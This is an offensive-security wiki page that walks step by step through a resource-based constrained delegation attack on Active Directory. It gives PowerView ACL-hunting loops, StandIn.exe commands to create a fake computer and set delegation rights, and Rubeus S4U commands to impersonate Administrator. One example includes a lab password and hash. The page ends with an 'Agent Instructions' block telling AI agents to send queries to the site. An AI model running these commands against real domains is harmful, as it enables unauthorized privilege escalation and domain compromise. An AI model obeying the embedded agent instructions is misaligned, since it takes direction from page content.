# Resource-based Constrained Delegation ## Resource-based Constrained Delegation Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate to them. This is achieved by modification of the attribute “*ms-DS-AllowedToActOnBehalfOfOtherIdentity*” which is used to control access of the target resource. Specifically if a resource such as a computer account has this attribute set then an account is allowed to act on behalf of the computer account. In order to be able to modify this attribute an account would need write permissions over that object which by default doesn’t have. However, if the SYSTEM account could be triggered and the authentication is relayed towards the Active Directory then it might be possible an account to obtain delegation rights and therefore to be able to act as an elevated user. ## Detection ### Required * WRITE privilege on a computer's AD object * Compromised computer and machine account hash OR * Ability to create a "fake" computer on the AD > If you have a previous compromise machine and machine hash/credential you can skip the skeps of creating a new machine. ### Checking `ms-ds-machineaccountquota` Since the attack will entail creating a new computer object on the domain, let's check if users are allowed to do it - by default, a domain member usually can add up to 10 computers to the domain. To check this, we can query the root domain object and look for property `ms-ds-machineaccountquota` #### Using WMI ```powershell Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select DS_ms_DS_MachineAccountQuota ``` ![](/files/bclSf1nZ6QBfE5TcvJQS) ### Detecting WRITE access ```powershell # Get all sids, all computer object ACLs, and find RBCD $usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } } # Get all SIDS, all computer object ACLs, and find RBCD $groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage Replica Administrators"} | select -exp objectsid; "Got group SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $groupsid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } } # Get all computer object SIDS, all computer object ACLs, and find RBCD $computersid = get-domaincomputer | select -exp objectsid; "Got computer SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $computersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } } ``` ## Exploiting Using StandIn.exe to create and add `msDS-AllowedToActOnBehalfOfOtherIdentity` to computer object. {% embed url="" %} ### Creating fake computer object ```powershell StandIn.exe --computer [fake computer] --make ``` ### Modifying Target Computer's AD Object With write access to a machine object this function allows the operator to add an `msDS-AllowedToActOnBehalfOfOtherIdentity` property to the machine which is required to perform a resource based constrained delegation attack. ```powershell $ServiceAccountSID = Get-DomainComputer [fake computer] -Properties objectsid | Select -Expand objectsid StandIn.exe --computer [target machine] --sid $ServiceAccountSID ``` #### Verifying change ```powershell StandIn.exe --delegation ``` ### Getting the hash value for machine account hash ```powershell Invoke-Rubeus -Command "hash /password:dZMRM5i0V5Bhdw1 /user:AttackObjStudent16$ /domain:it.gcb.local" ``` ### Impersonation ```powershell Invoke-Rubeus -Command "s4u /user:[fake computer]$ /rc4:[fake computer hash] /impersonateuser:[Impersonation user] /msdsspn:cifs/[target machine] /ptt" # Invoke-Rubeus -Command 's4u /user:IT-Employee16$ /rc4:f2870d37a6ead900448faae043f13a5c /impersonateuser:Administrator /msdsspn:host/it-track01 /altservice:cifs /domain:it.gcb.local /nowrap /ptt' ``` ## References {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rfc1918.gitbook.io/offsec/active-directory/privilege-escalation/kerberos-delegation/resource-based-constrained-delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.